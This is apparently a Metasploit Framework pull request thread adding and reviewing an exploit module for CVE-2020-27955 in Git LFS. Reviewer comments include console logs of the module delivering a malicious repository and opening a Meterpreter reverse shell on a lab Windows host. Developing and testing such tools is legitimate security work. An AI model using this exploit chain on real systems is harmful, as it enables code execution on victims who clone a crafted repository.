Add module for CVE-2020-27955
rapid7/metasploit-framework pull request #15624
Opened 2021-08-30 22:06 UTC by jheysel-r7

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!

Specific Hardware Examples:
* Switches
* Routers
* IP Cameras
* IoT devices

Complex Software Examples:
* Expensive proprietary software
* Software with an extensive installation process
* Software that requires exploit testing across multiple significantly different versions
* Software without an English language UI

We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.

2021-09-01 15:24 UTC, space-r7 reviewed
The module looks great! Aside from the review comments, this branch's history needs to be cleaned up. Try an interactive rebase, which will allow you to drop all of my commits from the branch. Let me know if you have any questions on that!

2021-09-01 15:49 UTC, smcintyre-r7 commented on modules/exploits/windows/http/git_lfs_rce.rb
> +  end
It also seems like these cases should be failing with `Failure::NotVulnerable` and `Failure::NoTarget` instead of `Failure::BadConfig` because the issue is the client and not something the user can remedy through the modules configuration.

2021-09-03 21:21 UTC, jheysel-r7 commented on modules/exploits/multi/http/git_lfs_clone_command_exec.rb
> -  def send_refs(req)
This needs to be added back in before merging

2021-09-03 21:27 UTC, wvu-r7 requested changes, later dismissed
Dismiss once finished and retested.

2021-09-07 17:47 UTC, jheysel-r7 commented on modules/exploits/multi/http/git_lfs_clone_command_exec.rb
> -  def send_refs(req)
Resolved

2021-09-09 13:15 UTC, smcintyre-r7 requested changes
I had to make some changes to the module, but I was able to get it to work.

```
msf6 exploit(windows/http/git_lfs_rce) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/git_lfs_rce) > 
[*] Started reverse TCP handler on 192.168.159.128:4444 

msf6 exploit(windows/http/git_lfs_rce) > 
msf6 exploit(windows/http/git_lfs_rce) > 
[*] Using URL: http://0.0.0.0:8080/wjKkkWJ1beEphR
[*] Local IP: http://192.168.250.87:8080/wjKkkWJ1beEphR
[*] Server started.
[*] Git repository to clone: http://192.168.159.128:8080/bytecard.git
[*] Sending payload data...
[*] Sending LFS object...
[*] Sending stage (200262 bytes) to 192.168.159.96
[+] Deleted .gitattributes
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.96:58842) at 2021-09-09 09:10:23 -0400

msf6 exploit(windows/http/git_lfs_rce) >
```

2021-09-09 13:15 UTC, smcintyre-r7 commented on modules/exploits/windows/http/git_lfs_rce.rb
> +    git_hook_obj = Msf::Exploit::Git::Lfs::GitObject.build_blob_object(hook_payload)
I had to update this line to fix the following exception:
```
[-] Exception handling request: uninitialized constant Msf::Exploit::Git::Lfs::GitObject
Did you mean?  Msf::Exploit::Git::GitObject
```

```suggestion
    git_hook_obj = GitObject.build_blob_object(hook_payload)
```

2021-09-09 13:15 UTC, smcintyre-r7 commented on modules/exploits/windows/http/git_lfs_rce.rb
> +  include Msf::Exploit::Remote::HttpClient
This doesn't appear to be necessary. I don't see where any HTTP requests are being made and I'm still able to successfully use the module without it.

2021-09-09 13:15 UTC, smcintyre-r7 commented on modules/exploits/windows/http/git_lfs_rce.rb
> +    ])
I think it'd be worth deregistering the RHOSTS option in here since it's not necessary. I'm not sure which mixin is adding it, but it's required to be set but can apparently be set to any IP address just to satisfy the pre-module run requirements.

2021-09-14 20:39 UTC, smcintyre-r7 commented
Submitted proposed changes in jheysel-r7/metasploit-framework#2.

2021-09-15 18:53 UTC, smcintyre-r7 commented
Looks all set now, working with Git 2.29.2 on Windows Server 2019.

```
msf6 exploit(windows/http/git_lfs_rce) > show options 

Module options (exploit/windows/http/git_lfs_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   GIT_URI                   no        The URI to use as the malicious Git instance (empty for random)
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Git LFS <= 2.12


msf6 exploit(windows/http/git_lfs_rce) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/git_lfs_rce) > 
[*] Started reverse TCP handler on 192.168.159.128:4444 

msf6 exploit(windows/http/git_lfs_rce) > 
[*] Using URL: http://0.0.0.0:8080/GTSURZAedHU9N
[*] Local IP: http://192.168.250.87:8080/GTSURZAedHU9N
[*] Server started.
[*] Git repository to clone: http://192.168.159.128:8080/tres-zap.git
[*] Sending payload data...
[*] Sending LFS object...
[*] Sending stage (200262 bytes) to 192.168.159.96
[+] Deleted .gitattributes
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.96:64019) at 2021-09-15 14:52:46 -0400

msf6 exploit(windows/http/git_lfs_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: MSFLAB\smcintyre
meterpreter > sysinfo
Computer        : WIN-3MSP8K2LCGC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > 
```

2021-09-15 18:54 UTC, smcintyre-r7 approved these changes

2021-09-15 18:55 UTC, merged

2021-09-15 18:57 UTC, smcintyre-r7 commented
# Release Notes
This adds an exploit for CVE-2020-27955 which is a vulnerability in the Git version control system. The module can be used to execute code in the context of a user that can be convinced to clone a malicious repository.